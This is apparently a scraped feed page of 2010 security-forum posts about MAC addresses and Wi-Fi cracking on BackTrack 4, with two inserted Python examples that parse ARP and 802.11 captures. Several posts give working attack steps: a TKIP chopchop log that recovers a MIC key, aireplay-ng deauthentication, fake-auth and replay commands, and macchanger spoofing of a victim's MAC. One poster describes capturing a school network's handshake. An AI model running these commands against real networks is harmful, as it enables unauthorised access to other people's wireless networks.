08:28:18 Offset 78 ( 7% done) | xor = 03 | pt = F4 | 144 frames written in 118079ms
08:29:34 Offset 77 ( 9% done) | xor = EF | pt = 6F | 157 frames written in 128742ms
08:30:42 Offset 76 (11% done) | xor = 76 | pt = 95 | 75 frames written in 61500ms
08:32:01 Offset 75 (14% done) | xor = BA | pt = 67 | 187 frames written in 153338ms
08:33:06 Offset 74 (16% done) | xor = 03 | pt = 14 | 54 frames written in 44279ms
08:34:25 Offset 73 (19% done) | xor = 02 | pt = A4 | 190 frames written in 155801ms
08:35:32 Offset 72 (21% done) | xor = F0 | pt = 3F | 67 frames written in 54943ms
08:36:52 Offset 71 (23% done) | xor = D5 | pt = 93 | 193 frames written in 158255ms
08:38:15 Offset 70 (26% done) | xor = 7D | pt = 1D | 230 frames written in 188622ms
Sleeping for 60 seconds.36 bytes still unknown
ARP Reply
Checking 192.168.x.y
08:38:15 Reversed MIC Key (FromDS): D6:16:91:B7:23:03:E4:25
Saving plaintext in replay_dec-0329-083815.cap
Saving keystream in replay_dec-0329-083815.xor
08:38:15
Completed in 836s (0.05 bytes/s)
08:38:15 AP MAC: 00:18:39:D3:FB:9E IP: 192.168.0.1
08:38:15 Client MAC: 00:1E:65:F8:BA:A8 IP: 192.168.0.103
08:38:15 Sent encrypted tkip ARP request to the client.
08:38:15 Wait for the mic countermeasure timeout of 60 seconds.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Sent 1172 packets, current guess: 8F...
Failure: got several deauthentication packets from the AP - you need to start the whole process all over again, as the client got disconnected.
root@bt:~#
Conclusions:
1. Win7/WinXP WPA supplicants ignore the AP key renewal timeout and never perform rekeying
2. The same applies to WM6.0/6.1 with HP iPAQ 614C and HTC Touch Viva T2223 smartphones
3. Linux WPA supplicants perform key renewal according to the AP settings.
-
5:51
»
remote-exploit & backtrack
Victim:
Model: HP 6310b
CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
Memory: 4GB
OS: Windows 7
Wireless Interface: Intel(R) WiFi Link 5100 AGN
WiFi security:WPA2/WPA-Enterprise with EAP-TLS(Smartcard or certificate) authentication, TKIP encryption
MAC address: 00:1E:65:F8:BA:A8
Attacker:
Model: Dell Optiplex GX270
CPU: Intel Pentium 4 2.60 GHz
Memory: 1GB
OS: BT4F
Wireless Card: Alfa AWUS360H with 7dB omnidirectional antenna
AP:
Model: Linksys WRT54GL v1.1
Firmware: v4.30.11, Aug. 17, 2007
Wireless security and settings: WPA2-Enterprise, AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
BSSID: 00:18:39:D3:FB:A0
Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange
Run airodump-ng for WPA:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR
BSSID STATION PWR Rate Lost Packets Probes
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
^C
root@bt:~#
Run airodump-ng for WPA2:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:24:8C:57:8F:D3 -68 0 - 2 0 8
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
00:1F:33:FF:39:52 00:18:39:D3:FB:A0 -36 1e- 1 0 8
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
^C
Change attacker's MAC address:
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
root@bt:~# ifconfig wlan0 up
(To be Continued)
-
-
15:19
»
remote-exploit & backtrack
I recently installed BackTrack 4 on my macbook pro. While the installation for backtrack completed successfully, the mac side had an error. When partitioning the hard drive, I made the BackTrack 4 the root and left the mac side of the hard drive to the default that it had been set at. After installing BackTrack the mac side of the computer was not seen. When looking at the partition in BackTrack I saw that the mac side was not recognizable. I do not think the partition was wiped clean, but at the same time, I have no idea how to get it back and running. Any help is greatly appreciated!
-
-
10:06
»
remote-exploit & backtrack
Hi bt users
I am doing an experiment in which I am trying to get an energy-saving protocol into the 802.11 MAC layer.
I am using Orinoco cards in ad-hoc mode and 2 computers with Ubuntu 8.10.
I am planning to switch over to BT4 as I need to dump the packets and then analyse them for throughput etc.
I am using tcpdump/wireshark for this.
In the next stage I am going to fix the power of both cards, vary the distances and analyse the packet loss.
Can someone recommend me utilities specifically in BT4?
Lastly, I am planning to make one node the master and inject the protocol using some utility. Please recommend utilities to achieve my experiment.
Thanks in advance
-
-
17:00
»
Packet Storm Security Recent Files
ARP Sniff (Sniffer Lite) is a tiny ARP sniffer. This tool will be useful to analyze the ARP packets in the network. The tool gives out two types of information, the 14 byte Ethernet header and 28 byte ARP header. The tool requires G++ compiler and a libpcap package. Three arguments are coded as of now. One is to list the available devices, second is to sniff the default device and third is to sniff the device given as argument. The sniffer outputs the Ethernet header (Source MAC address, Destination MAC address and Ethernet type), ARP Header (Hardware type, Protocol type, Hardware address length, Protocol address length, Opcode, Source Hardware address and Protocol address, Destination hardware address and Protocol address).
-
17:00
»
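The 14-byte Ethernet header and 28-byte ARP header the tool decodes are fixed-layout, so a few lines of struct unpacking reproduce its output, and once the fields are out, the check a defender actually wants is one dictionary away: ARP poisoning (tagged on this page) shows up as a single IP address being advertised by more than one sender MAC, or as an ARP sender address that disagrees with the Ethernet source. The following is an added example in Python, not the tool's C++ source: a builder and parser for Ethernet/ARP frames and a conflict finder run over a constructed set of frames (all addresses are made up).

```python
import struct
from collections import defaultdict

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType: 14 bytes
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa: 28 bytes
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_b(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_b(s):
    return bytes(int(x) for x in s.split("."))


def mac_s(b):
    return ":".join("%02x" % x for x in b)


def ip_s(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sha, spa, tha, tpa):
    """Ethernet + ARP frame; requests go to the broadcast MAC, replies to the target."""
    eth_dst = b"\xff" * 6 if op == ARP_REQUEST else mac_b(tha)
    return (ETH_HDR.pack(eth_dst, mac_b(sha), ETHERTYPE_ARP)
            + ARP_HDR.pack(1, 0x0800, 6, 4, op, mac_b(sha), ip_b(spa), mac_b(tha), ip_b(tpa)))


def parse_arp_frame(frame):
    """Return the Ethernet and ARP header fields, or None if the frame is not ARP."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        raise ValueError("frame too short")
    eth_dst, eth_src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {
        "eth_dst": mac_s(eth_dst), "eth_src": mac_s(eth_src),
        "op": {ARP_REQUEST: "request", ARP_REPLY: "reply"}.get(op, str(op)),
        "sha": mac_s(sha), "spa": ip_s(spa), "tha": mac_s(tha), "tpa": ip_s(tpa),
        # a sender hardware address differing from the Ethernet source is a classic spoofing tell
        "src_mismatch": eth_src != sha,
    }


def find_conflicts(frames):
    """IPs advertised by more than one MAC across the frames: the footprint ARP poisoning leaves."""
    claims = defaultdict(set)
    for f in frames:
        p = parse_arp_frame(f)
        if p is not None:
            claims[p["spa"]].add(p["sha"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


# Constructed sample traffic (every address is made up)
SAMPLE_FRAMES = [
    build_arp(ARP_REQUEST, "aa:bb:cc:00:00:05", "10.0.0.5", "00:00:00:00:00:00", "10.0.0.1"),
    build_arp(ARP_REPLY, "aa:bb:cc:00:00:01", "10.0.0.1", "aa:bb:cc:00:00:05", "10.0.0.5"),  # real gateway
    build_arp(ARP_REPLY, "aa:bb:cc:00:00:99", "10.0.0.1", "aa:bb:cc:00:00:05", "10.0.0.5"),  # poisoned claim
    ETH_HDR.pack(b"\xff" * 6, mac_b("aa:bb:cc:00:00:05"), 0x0800) + b"\x00" * 28,           # IPv4, not ARP
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(parse_arp_frame(f))
    print("conflicts:", find_conflicts(SAMPLE_FRAMES))
```

On a live capture the same parser would sit behind a libpcap reader; the conflict map is the state a static ARP table or a tool like arpwatch keeps, and the second reply for 10.0.0.1 is what it would alert on.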
Hack a Day
[Jake Howe] brought his 1984 Mac up-to-date by cramming new guts inside of the classic case. The goal from the start was to run OS X Snow Leopard on the machine without altering the externals. He heated and formed acrylic around the original CRT screen to make a bezel for the replacement LCD screen. The [...]
-
-
13:07
»
remote-exploit & backtrack
Problem with station mac because it withdraws five with six why in one bssid
-
10:03
»
remote-exploit & backtrack
Hi,
can a WEP key be cracked when the target router uses MAC address filtering?
Thanks in advance.
-
-
16:57
»
remote-exploit & backtrack
How do I retrieve the client MAC from my cap file?
I'm using "airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w output-home mon0" to filter by the AP I'm monitoring.
Apparently a client connected, because I see that I have collected 75 IVs, but I didn't see the client MAC (I'm assuming it refreshed out, or whatever) by the time I saw the data numbers. So, I'm hoping to get the client MAC from the cap file.
Feel free to point me to a related post, but I didn't find one via search.
Thanks!
-
10:57
»
remote-exploit & backtrack
hi all
i have a little question!
We've set up an AP with a WEP shared key and I assumed that a hacker may have my WEP key!!
So we decided to restrict the MAC addresses of the wireless cards!
Is there any way that someone can fake these MACs or bypass this limitation?
I read that if this restriction is present, it is possible to notice it with a tcpdump command
by getting a deauth result, so I want to know: can this limitation protect my AP?!
-
-
9:11
»
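The two questions above, how to pull the client MAC back out of an airodump-ng capture and whether a MAC allow-list on the AP keeps an attacker out, have the same answer: the station addresses travel in cleartext in every 802.11 data frame header, WEP or not, so anyone who can capture the frames can read the permitted addresses and take one over with macchanger. The following is an added example, not code from either post: a parser that reads the pcap airodump-ng -w writes, picks the station side of each data frame from the To DS / From DS bits, and counts data frames per station and BSSID. It handles link types 105 (raw 802.11) and 127 (radiotap). The BSSID 00:11:22:33:44:55 from the post is reused; the station addresses and the frames are constructed sample data.

```python
import struct

DLT_IEEE802_11 = 105        # raw 802.11 frames, what airodump-ng -w writes by default
DLT_IEEE802_11_RADIO = 127  # 802.11 frames preceded by a radiotap header
PCAP_MAGIC = 0xA1B2C3D4


def mac2bytes(m):
    return bytes(int(x, 16) for x in m.split(":"))


def bytes2mac(b):
    return ":".join("%02x" % x for x in b)


def frame(ftype, subtype, to_ds, from_ds, a1, a2, a3, payload=b""):
    """Minimal 802.11 MAC header (no FCS): Frame Control, Duration, Addr1-3, Seq Ctrl."""
    fc0 = (ftype << 2) | (subtype << 4)
    fc1 = (to_ds & 1) | ((from_ds & 1) << 1)
    return (bytes([fc0, fc1]) + b"\x00\x00" + mac2bytes(a1) + mac2bytes(a2)
            + mac2bytes(a3) + b"\x00\x00" + payload)


def with_radiotap(f):
    # radiotap header: version 0, pad, little-endian length 8, no present fields
    return struct.pack("<BBHI", 0, 0, 8, 0) + f


def build_pcap(frames, linktype=DLT_IEEE802_11):
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f
    return out


def pcap_records(data):
    """Yield (linktype, packet bytes) for each record; handles both byte orders."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        yield linktype, data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len


def stations_by_bssid(pcap_bytes):
    """Map BSSID -> {station MAC: number of data frames seen to or from it}."""
    result = {}
    for linktype, pkt in pcap_records(pcap_bytes):
        if linktype == DLT_IEEE802_11_RADIO:
            pkt = pkt[struct.unpack("<H", pkt[2:4])[0]:]   # skip the radiotap header
        elif linktype != DLT_IEEE802_11:
            raise ValueError("unsupported link type %d" % linktype)
        if len(pkt) < 24 or (pkt[0] >> 2) & 3 != 2:
            continue                                      # only data frames carry IVs
        to_ds, from_ds = pkt[1] & 1, (pkt[1] >> 1) & 1
        a1, a2, a3 = pkt[4:10], pkt[10:16], pkt[16:22]
        if to_ds and from_ds:
            continue                                      # WDS: no BSSID in Addr1-3
        if to_ds:
            bssid, sta = a1, a2      # client -> AP: Addr1 = BSSID, Addr2 = SA
        elif from_ds:
            bssid, sta = a2, a1      # AP -> client: Addr1 = DA, Addr2 = BSSID
        else:
            bssid, sta = a3, a2      # IBSS: Addr3 = BSSID, Addr2 = SA
        if sta[0] & 1:
            continue                                      # broadcast/multicast is not a client
        stas = result.setdefault(bytes2mac(bssid), {})
        stas[bytes2mac(sta)] = stas.get(bytes2mac(sta), 0) + 1
    return result


# Constructed sample capture: the BSSID from the post, two made-up clients, a second AP.
AP, STA1, STA2 = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"
OTHER_AP, BCAST = "66:77:88:99:aa:bb", "ff:ff:ff:ff:ff:ff"
SAMPLE_FRAMES = [
    frame(0, 8, 0, 0, BCAST, AP, AP),                 # beacon (management): ignored
    frame(2, 0, 1, 0, AP, STA1, BCAST, b"\x00" * 8),  # STA1 -> AP, broadcast ARP
    frame(2, 0, 0, 1, STA1, AP, STA2),                # AP -> STA1
    frame(2, 0, 1, 0, AP, STA2, STA1),                # STA2 -> AP
    frame(2, 0, 0, 1, BCAST, AP, STA1),               # AP -> broadcast: no client side
    frame(2, 0, 1, 0, OTHER_AP, STA2, BCAST),         # STA2 talking to another BSSID
]
SAMPLE_PCAP = build_pcap(SAMPLE_FRAMES)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for bssid, stas in stations_by_bssid(data).items():
        for sta, n in stas.items():
            print("%s  station %s  data frames: %d" % (bssid, sta, n))
```

Run it against the file airodump-ng produced for the command in the post (output-home-01.cap, the prefix with -01 appended) to list every station that exchanged data with 00:11:22:33:44:55; with the --bssid filter in place, that is where the 75 IVs came from. Any address on that list is one the AP's MAC filter already trusts.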
remote-exploit & backtrack
tried to recover the key in clientless mode (the data are not real but the commands are accurate)
airodump-ng -c 11 -b 00:1A:C1:15:BE:34 -w cap mon0
CH 11 ][ Elapsed: 3 mins ][ 2010-02-26 13:34
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:1A:C1:15:BE:34 -74 100 1986 0 0 11 54 . WEP WEP OPN 3
BSSID STATION PWR Rate Lost Packets Probes
so far everything OK; no client, so chopchop attack
aireplay-ng -1 0 -a 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0 (command to associate)
13:31:11 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
13:31:11 Sending Authentication Request (Open System) [ACK]
13:31:11 Authentication successful
13:31:11 Sending Association Request [ACK]
13:31:11 Association successful :-) (AID: 1)
so far everything OK, at least in my opinion.
aireplay-ng -4 -b 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
13:31:29 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
^Cad 1502 packets...
Here I think there is a problem: shouldn't it have opened a different window and then asked me to confirm with Y? Instead it started without asking me anything and keeps looping forever?
It should have replied like this:
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
-
-
7:04
»
remote-exploit & backtrack
hi all
I tried to crack a friend's WEP-encrypted AP with aircrack-ng (command line; if any GUI exists please let me know)
I use these commands:
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
sudo aireplay-ng -1 0 -e Torkanet -a 00:00:00:00:00:00 -h00:00:00:00:00:00 wlan0
(the MAC addresses are different but the AP is Torkanet :D and it is on channel 5)
this is when no clients are present!
and these commands when we use a client:
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -0 10 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
the problem is when aircrack-ng gets packets it says ".....still nothing tring another package"; it does this over and over and over until I ran low on physical memory :D!! what should I do?
is our network secure enough?
and another silly question :D about this command:
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
which MAC address is mine and which is the AP's? (the same question goes for the -3 option!!)
by the way sorry for my weak English!!:D
-
-
12:00
»
Hack a Day
[Robert] wrote a program using Max/MSP that lets him make music with his guitar hero controller. There’s another video after the break where he walks through the various features but here’s the gist of it. This works on Mac and Windows and allows a sort of ‘live play’ or midi mapping mode. In the midi [...]
-
-
18:13
»
remote-exploit & backtrack
Okay, so i've been searching for about 2 days and can't find a solution... It's getting frustrating. The things I have found aren't very user friendly in explanation or seem to be really out dated. I have a MacBook Pro running BT4 Final and can't get the right click working. Have tried messing with the xorg.conf file and just can't seem to get it exactly. Any help or links to some place that would explain it in the least confusing fashion would be awesome. :) Thanks in advance for any help.
-
-
14:51
»
remote-exploit & backtrack
I am having a little problem with capturing my WPA handshake. NOTE: This is for MY home network. I have even tried turning the connected computer off and unplugging it from the router, also turning the router off and back on. NOTHING works; I simply can not capture MY handshake. I attend college as a Network Admin, where I captured my school's handshake, but I believe this is because there are always lots of people connected to the network. I can't remember if I even had to deauth a computer, although now that I think of it I believe I did, as well as spoofed my MAC. NOTE: I am not spoofing my MAC for my home network. Can someone please help?
-
-
0:00
»
remote-exploit & backtrack
Ok,.. So I got a pickle here and wanted to know if anyone ran into this,..
Went with Verizon FiOS and they have their own routers because, I am assuming, fiber optics? For giggles I tried to crack the new router at my house and it won't let me inject into it. Works fine for my Linksys one, but for some reason their router seems to be something new. There is something else new: you know it tells you the speed of the connection, like 54 (Mbps)? Well, it says 54e.
Wait, did some research... is this a case of MAC address filtering? If so, how do I adapt?
Also, does that e mean that there is in fact MAC address filtering going on?
-
-
8:33
»
remote-exploit & backtrack
Hi
I would like to know what you think of the Wi-Fi security level of my Freebox.
I use a WPA (TKIP + AES) Wi-Fi key of 63 randomly generated characters.
In addition I have enabled the router and allowed a DHCP pool of 12 addresses, used by all my Wi-Fi devices.
And for each of those IP addresses I have reserved the MAC address of one of my devices.
So no IP address is available to an unknown MAC address.
Do you think it is possible to crack my network without knowing my MAC addresses? Can these MAC addresses be found remotely?
Thanks
-
8:20
»
remote-exploit & backtrack
Dear back|track users,
I have been experiencing a problem:
Previous search terms -
Searched google and BT for terms along the lines of:
mac spoof(ing) aireplay fake auth(entication) deauthentication packet
and any combination of those, but have not found a definitive answer that addresses the difficulty I'm experiencing.
Platform -
back|track4 pre-final live USB
card1: intel 5100 (bleeding edge driver from dec 2009)
card2: alfa AWUS036H (native rtl8187 drivers from BT4-prefinal)
target AP: Personal D-link router WBR-1310 (10 ft away)
NO MAC filtering set on target AP, WEP enabled
Description of problem:
Boot up BT4
airmon-ng start wlan0 (for alfa)
airodump-ng -c 1 mon0 (to fix the channel at 1)
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==> Fake auth success
change mac:
original mac: XX:XX:XX:XX:XX:BA
new mac : XX:XX:XX:XX:XX:BB (or any other change)
ifconfig wlan0 down; ifconfig mon0 down;
macchanger -m XX:XX:XX:XX:XX:BB wlan0
macchanger -m XX:XX:XX:XX:XX:BB mon0
ifconfig mon0 up;
airodump-ng -c 1 mon0
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==>
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Got a deauthentication packet! (Waiting 3 seconds)
.
.
.
Got a deauthentication packet! (Waiting 5 seconds)
.
.
. etc.
This happens for both Intel 5100 and Alfa AWUS036H
When I attempt an attack on my office router (with permission, namely by me), the mac spoofing doesn't seem to result in deauthentication from the router.
What can be done:
1) Injection test, aireplay-ng --test mon0, will result in successful injection on both spoofed mac and original mac
2) With original mac, most attacks on d-link are successful as per tutorials on this page and other sources, including attacks 2,3,4, and subsequent aircracks and dictionary/table attacks. Once connected and ARP poisoned, many other attacks also work as usual.
QUESTION:
+How can the router possibly know what my original mac address is? (Again, NO MAC filters on routers)
+Why does it allow fake auth if I use original mac, but denies authentication when I use other macs (both completely random, or pseudo random spoofing like changing the last digit) ?
+Is there a work around?
Thank you for taking time to read my question, I appreciate any questions regarding my setup or comments on how I can approach the problem.
C.
-
14:24
»
remote-exploit & backtrack
As the title stated, I am trying to find some facts about
WHICH USB Wifi N-Draft that is known to work with Backtrack installed on VMWare Fusion.
The USB N-Draft that I am looking are the ones that supports
BOTH 2.4Ghz and 5Ghz.
If someone has used a particular USB N-Draft Wifi for the above, could you share the brand, model and where you buy it?
Thanks!
-
-
4:33
»
SecDocs
Authors:
Fabian Yamaguchi Tags:
exploiting client side Event:
Chaos Communication Congress 26th (26C3) 2009 Abstract: We will be presenting a number of previously undisclosed network-related design errors, ranging from data-link-layer bugs in Ethernet-drivers across issues in TCP/IP stacks all the way up to communication infrastructure components on layer 5. Our focus is on subtle mistakes, which do not fall into the memory-corruption category and yet in combination provide an attacker with a powerful bag of tricks. Built around a fictional average company network, we will tell the story of an attack making use of subtle bugs across the layers all of which are as of yet undisclosed. This will include a bug in an Ethernet-driver, which allows an attacker to bypass MAC- and IP-based filters, bugs in TCP-implementations that are assumed to be fixed but aren't, a web-cache which confuses itself and an instant-messenger, which was fooled by the protocol specification. All of these bugs share a common property: They are a consequence of insecure design and not of insecure coding-practices.
-
4:33
»
remote-exploit & backtrack
I read the man pages of ettercap and it said the target can be in the form
MAC/IP/PORTS
Ok...
To all my dear dark lords... I have 2 basic questions, for which I request some help:
<> If I specify MAC addresses /MAC/ /MAC2/ it says Invalid IP range. So how do you specify them, or is that not allowed?
<> More important one: I would like to SNIFF NOT ALL BUT JUST PACKETS OF PORTS # 80 AND 443 FOR A SPECIFIC IP RANGE.
I thought this would convey the information:
ettercap <options> /IP:port1,port2/ /IP2:Port1,port2/
but it does not like that format either.
Can someone please let me know if that is possible and how.
MANY THANKS
S
-
-
6:01
»
remote-exploit & backtrack
How to connect to your phone via Bluetooth to access Internet
by:MWood
This is not 100% foolproof, but works for me.
My provider is DNA Finland; your chatscript line
may be different according to your service description.
Config your files:
/etc/bluetooth
-
edit
rfcomm.conf and
main.conf
/etc/bluetooth/rfcomm.conf
#
# RFCOMM configuration file.
#
rfcomm0 {
# # Automatically bind the device at startup
bind yes;
#
# # Bluetooth address of the device
device 00:26:CC:8A:24:59;
#
# # RFCOMM channel for the connection
channel 1;
#
# # Description of the connection
comment "Dial-Up Networking";
}
/etc/bluetooth/main.conf
[General]
# List of plugins that should not be loaded on bluetoothd startup
#DisablePlugins = network,input
# Default adaper name
# %h - substituted for hostname
# %d - substituted for adapter id
#Name = %h-%d
Name = YOUR_BOX
# Default device class. Only the major and minor device class bits are
# considered
#Class = 0x000100
Class = 0x0a010c
# run "hciconfig hci0 class"
# How long to stay in discoverable mode before going back to non-discoverable
# The value is in seconds. Default is 180, i.e. 3 minutes.
# 0 = disable timer, i.e. stay discoverable forever
DiscoverableTimeout = 0
# Use some other page timeout than the controller default one
# (16384 = 10 seconds)
PageTimeout = 8192
# Behaviour for Adapter.SetProperty("mode", "off")
# Possible values: "DevDown", "NoScan" (default)
OffMode = NoScan
# Discover scheduler interval used in Adapter.DiscoverDevices
# The value is in seconds. Default is 0 to use controller scheduler
DiscoverSchedulerInterval = 0
/etc/ppp/peers: create a file "BluetoothDialup"
/etc/ppp/peers/BluetoothDialup
debug
noauth
connect "/usr/sbin/chat -v -f /etc/chatscripts/BluetoothDialup"
usepeerdns
/dev/rfcomm0 115200
defaultroute
crtscts
lcp-echo-failure 0
/etc/chatscripts: create a file "BluetoothDialup" (yes, the same name as above)
/etc/chatscripts/BluetoothDialup
TIMEOUT 35
ECHO ON
ABORT '\nBUSY\r'
ABORT '\nERROR\r'
ABORT '\nNO ANSWER\r'
ABORT '\nNO CARRIER\r'
ABORT '\nNO DIALTONE\r'
ABORT '\nRINGING\r\n\r\nRINGING\r'
'' \rAT
OK 'AT+CGDCONT=1, "IP", "INTERNET"'
OK ATD*99#
CONNECT ""
note: the line
OK ATD*99#
is your dialup number; mine is simply *99#
note: the line
OK 'AT+CGDCONT=1, "IP", "INTERNET"'
is very important, especially the "INTERNET" entry; this should
match your phone's service. Mine is "dna INTERNET" on my phone, but
the correct info for the script is "INTERNET".
If you get an error about needing to subscribe to blahblah, you got it wrong!
/var/lib/YOUR_BT4_BLUETOOTHDEVICE_MAC/: create a file called "pincodes" and enter on one line...
YOUR_PHONES_MAC PIN
/var/lib/YOUR_BT4_BLUETOOTHDEVICE_MAC/pincodes
example:
00:11:22:33:44:55 1234
restart the bt daemon...
user@bt~# /etc/init.d/bluetooth restart
to connect issue the command...
user@bt~# pon BluetoothDialup
to disconnect issue the command...
user@bt~# poff BluetoothDialup
problems:
If you have previously paired your phone in Windows,
you may need to delete the old pairing,
then re-pair in BT4. Pairing will be from BT4->Phone
(accept request and PIN:1234)
remote-exploit & backtrack
Hi,
I just got a simple question that I could not answer, since I could not find the information anywhere...
Can an Ettercap filter be used for Layer 2 parameters? (MAC addresses)
I tried to create a filter using the parameters "eth.src and eth.dst" and etterfilter compiled it without problems. Anyway, once the filter is applied, it does not filter as desired...
thanks for the help!
best regards.
remote-exploit & backtrack
So I came across a 4 minute video on youtube on how to penetrate my own router. I have a Belkin router and I was able to do everything the fella in the video has done.
I use VMWare to run BT4. I type out everything he does but with my own info obviously. And this is what I see afterwards...
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 676863 packets (got 1 ARP requests and 19928 ACKs), sent 623247 packets...(499 pps)
I know nothing of what I am doing. It just looked easy and I happen to have a USB adapter. But whatever I am doing I had fun.
thanks
remote-exploit & backtrack
Hello,
I have installed BT4 because I need to use Ettercap for some integrity tests on a network.
I have tried several filters to alter IP and TCP information and they work great.
I also wanted to alter layer two information (MAC addresses, basically).
In the filter I define several conditions depending on the source MAC or destination MAC (eth.src or etc.dst). It lets me compile the filter and run it, but it skips the conditions as it pleases...
Does anyone know what might be causing this?
Thanks!
Hi everyone,
I have been looking throughout the forum and in Google, and have found nothing...that's why I post this new thread.
I am using ETTERCAP for testing some security and structural issues of a network.
I configured and compiled some filters for IP and HTTP traffic and worked with no problems.
The problems came when I tried to do Layer 2 (MAC address) filters. I did some filter conditions using eth.src and etc.dst, but it did not work. The filter compiled without problems, but the filter did not apply, even if the conditions were fulfilled (I made cross tests with a sniffer and ettercap-filter messages).
Do I have to configure something special to make this filter work?
Thank you everyone for your help!
Hi,
I've looked in the documentation, but found nothing...
Is it possible to introduce delays in the sent messages using ettercap bridged sniffing?
thanks!